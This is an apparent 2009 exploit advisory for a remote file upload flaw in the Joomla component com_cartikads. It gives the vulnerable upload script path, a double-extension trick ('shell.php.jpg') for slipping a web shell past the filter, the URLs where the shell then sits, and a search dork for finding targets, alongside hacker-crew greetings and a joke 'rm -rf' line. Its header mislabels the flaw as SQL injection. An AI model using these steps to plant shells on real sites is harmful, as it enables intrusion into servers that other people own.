62 lines
No EOL
1.9 KiB
Text
62 lines
No EOL
1.9 KiB
Text
###################################################################################
|
|
#
|
|
[~] Joomla components com_cartikads Remote File Upload vulnerability #
|
|
[~] Author : kaMtiEz (kamzcrew@yahoo.com) #
|
|
[~] Homepage : http://www.indonesiancoder.com #
|
|
[~] Date : January 02, 2009 #
|
|
#
|
|
###################################################################################
|
|
|
|
[ Software Information ]
|
|
|
|
[+] Vendor : http://www.cartikahosting.com
|
|
[+] Download : -
|
|
[+] version : 1.0
|
|
[+] Vulnerability : SQL injection
|
|
[+] Dork : "Think iT"
|
|
[+] Price : dunno
|
|
[+] Location : INDONESIA - JOGJA
|
|
[+] description : Cartikads is a Mambo Open Source ads management component.
|
|
|
|
##################################################################################
|
|
|
|
|
|
[ HERE WE GO .. LIVE FROM JOGJA CITY ]
|
|
|
|
[ Vulnerable File ]
|
|
|
|
http://server/[kaMtiEz]/components/com_cartikads/uploadimage.php
|
|
|
|
[ NOTE ]
|
|
|
|
upload with extension shell.php.jpg
|
|
|
|
your shell will be
|
|
|
|
http://server/[kaMtiEz]/images/stories/shell.php.jpg
|
|
|
|
http://server/[kaMtiEz]/images/banners/shell.php.jpg
|
|
|
|
|
|
===========================================================================
|
|
|
|
[ Thx TO ]
|
|
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
|
|
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
|
|
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah
|
|
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
|
|
|
|
[ NOTE ]
|
|
|
|
[+] Nyak ama babe gua .. tak lupa adik gua ..
|
|
[+] tukulesto : where did u go ??
|
|
[+] Dengerin Radio yach di http://antisecradio.fm :D
|
|
|
|
[ QUOTE ]
|
|
|
|
[+] rm -rf
|
|
|
|
[ EOF ]
|
|
|
|
[+] INDONESIANOCODER TEAM
|
|
[+] KILL -9 TEAM |